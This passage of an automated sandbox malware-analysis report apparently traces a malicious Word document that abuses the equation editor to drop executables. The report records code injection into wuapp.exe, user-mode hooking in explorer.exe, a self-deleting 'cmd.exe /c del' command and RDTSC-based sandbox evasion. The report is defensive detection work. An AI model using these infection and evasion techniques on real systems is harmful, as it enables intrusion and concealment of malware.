Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A00048 NtProtectVirtualMemory,LdrInitializeThunk,		6_2_00A00048
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009FF9F0 NtClose,LdrInitializeThunk,		6_2_009FF9F0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009FF900 NtReadFile,LdrInitializeThunk,		6_2_009FF900
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		6_2_009FFAD0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009FFAE8 NtQueryInformationProcess,LdrInitializeThunk,		6_2_009FFAE8
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009FFBB8 NtQueryInformationToken,LdrInitializeThunk,		6_2_009FFBB8
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009FFB68 NtFreeVirtualMemory,LdrInitializeThunk,		6_2_009FFB68
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009FFC90 NtUnmapViewOfSection,LdrInitializeThunk,		6_2_009FFC90
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009FFC60 NtMapViewOfSection,LdrInitializeThunk,		6_2_009FFC60
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009FFD8C NtDelayExecution,LdrInitializeThunk,		6_2_009FFD8C
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009FFDC0 NtQuerySystemInformation,LdrInitializeThunk,		6_2_009FFDC0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009FFEA0 NtReadVirtualMemory,LdrInitializeThunk,		6_2_009FFEA0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		6_2_009FFED0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009FFFB4 NtCreateSection,LdrInitializeThunk,		6_2_009FFFB4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A010D0 NtOpenProcessToken,		6_2_00A010D0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A00060 NtQuerySection,		6_2_00A00060
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A001D4 NtSetValueKey,		6_2_00A001D4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A0010C NtOpenDirectoryObject,		6_2_00A0010C
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A01148 NtOpenThread,		6_2_00A01148
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F600C4 NtCreateFile,LdrInitializeThunk,		8_2_01F600C4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F607AC NtCreateMutant,LdrInitializeThunk,		8_2_01F607AC
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5F9F0 NtClose,LdrInitializeThunk,		8_2_01F5F9F0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5F900 NtReadFile,LdrInitializeThunk,		8_2_01F5F900
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FBB8 NtQueryInformationToken,LdrInitializeThunk,		8_2_01F5FBB8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FB68 NtFreeVirtualMemory,LdrInitializeThunk,		8_2_01F5FB68
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FB50 NtCreateKey,LdrInitializeThunk,		8_2_01F5FB50
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FAE8 NtQueryInformationProcess,LdrInitializeThunk,		8_2_01F5FAE8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		8_2_01F5FAD0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FAB8 NtQueryValueKey,LdrInitializeThunk,		8_2_01F5FAB8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FDC0 NtQuerySystemInformation,LdrInitializeThunk,		8_2_01F5FDC0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FD8C NtDelayExecution,LdrInitializeThunk,		8_2_01F5FD8C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FC60 NtMapViewOfSection,LdrInitializeThunk,		8_2_01F5FC60
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FFB4 NtCreateSection,LdrInitializeThunk,		8_2_01F5FFB4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		8_2_01F5FED0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F601D4 NtSetValueKey,		8_2_01F601D4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F61148 NtOpenThread,		8_2_01F61148
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F6010C NtOpenDirectoryObject,		8_2_01F6010C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F610D0 NtOpenProcessToken,		8_2_01F610D0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F60078 NtResumeThread,		8_2_01F60078
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F60060 NtQuerySection,		8_2_01F60060
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F60048 NtProtectVirtualMemory,		8_2_01F60048
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F61930 NtSetContextThread,		8_2_01F61930
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5F938 NtWriteFile,		8_2_01F5F938
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5F8CC NtWaitForSingleObject,		8_2_01F5F8CC
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FBE8 NtQueryVirtualMemory,		8_2_01F5FBE8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FA50 NtEnumerateValueKey,		8_2_01F5FA50
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FA20 NtQueryInformationFile,		8_2_01F5FA20
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F61D80 NtSuspendThread,		8_2_01F61D80
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FD5C NtEnumerateKey,		8_2_01F5FD5C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FC90 NtUnmapViewOfSection,		8_2_01F5FC90
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F60C40 NtGetContextThread,		8_2_01F60C40
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FC48 NtSetInformationFile,		8_2_01F5FC48
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FC30 NtOpenProcess,		8_2_01F5FC30
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FFFC NtCreateProcessEx,		8_2_01F5FFFC
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FF34 NtQueueApcThread,		8_2_01F5FF34
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FEA0 NtReadVirtualMemory,		8_2_01F5FEA0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5FE24 NtWriteVirtualMemory,		8_2_01F5FE24
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AA350 NtCreateFile,		8_2_000AA350
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AA400 NtReadFile,		8_2_000AA400
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AA480 NtClose,		8_2_000AA480
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AA530 NtAllocateVirtualMemory,		8_2_000AA530
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AA34A NtCreateFile,		8_2_000AA34A
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AA3FB NtReadFile,		8_2_000AA3FB
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AA47B NtClose,		8_2_000AA47B

Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe 78C9548A33ABD68ED553BB2A48166AFD21041B9D868A0373E4A11B93409DB049

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 77620000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 77740000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Memory allocated: 77620000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Memory allocated: 77740000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Memory allocated: 77620000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Memory allocated: 77740000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Memory allocated: 77620000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Memory allocated: 77740000 page execute and read and write			Jump to behavior

Source: Revised RFQ-PO180911.doc	Virustotal: Detection: 31%
Source: Revised RFQ-PO180911.doc	ReversingLabs: Detection: 32%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Users\user\AppData\Roaming\word.exe	Process created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Process created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wuapp.exe C:\Windows\SysWOW64\wuapp.exe
Source: C:\Windows\SysWOW64\wuapp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Process created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"			Jump to behavior

Source: C:\Users\user\AppData\Roaming\word.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$vised RFQ-PO180911.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6029.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@11/14@5/3

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 4_2_00402078 CoCreateInstance,MultiByteToWideChar,

4_2_00402078

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 4_2_00404333 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

4_2_00404333

Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp

Binary or memory string: .VBPud<_

Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\krajo\ynpcjm\ntdn\3216792803f64d1292a50b8c7f0c4afc\ibwuyp\qahbtotu\Release\qahbtotu.pdb source: word.exe, 00000004.00000002.945823698.0000000002800000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp, dvukljmnr.exe, 00000005.00000000.914293624.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1182845110.000000000244F000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182267839.00000000002C2000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe.4.dr, nstBFBE.tmp.4.dr
Source:	Binary string: wntdll.pdb source: dvukljmnr.exe, dvukljmnr.exe, 00000006.00000003.923098867.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984351623.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000003.925762664.0000000000740000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000002.1182604769.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.985104310.00000000009A0000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.983888458.0000000000840000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wuapp.pdb source: dvukljmnr.exe, 00000006.00000002.984008037.0000000000504000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.983799814.0000000000030000.00000040.10000000.00040000.00000000.sdmp

Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_009061EC push FFFFFFF0h; ret		2_2_00906398
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00906330 push FFFFFFF0h; ret		2_2_00906398
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_009AF225 push ecx; ret		5_2_009AF238
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041E9E6 push edx; ret		6_2_0041E9EE
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00416B6D push ebx; ret		6_2_00416B85
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041D4F2 push eax; ret		6_2_0041D4F8
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041D4FB push eax; ret		6_2_0041D562
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041D4A5 push eax; ret		6_2_0041D4F8
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041D55C push eax; ret		6_2_0041D562
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041EEB5 push esi; ret		6_2_0041F0D9
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009AF225 push ecx; ret		6_2_009AF238
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F6DFA1 push ecx; ret		8_2_01F6DFB4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AD4A5 push eax; ret		8_2_000AD4F8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AD4FB push eax; ret		8_2_000AD562
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AD4F2 push eax; ret		8_2_000AD4F8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AD55C push eax; ret		8_2_000AD562
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AE9E6 push edx; ret		8_2_000AE9EE
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000A6B6D push ebx; ret		8_2_000A6B85
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AEEB5 push esi; ret		8_2_000AF0D9

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 4_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,

4_2_00405DDA

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Roaming\word.exe	File created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\word.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEB

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
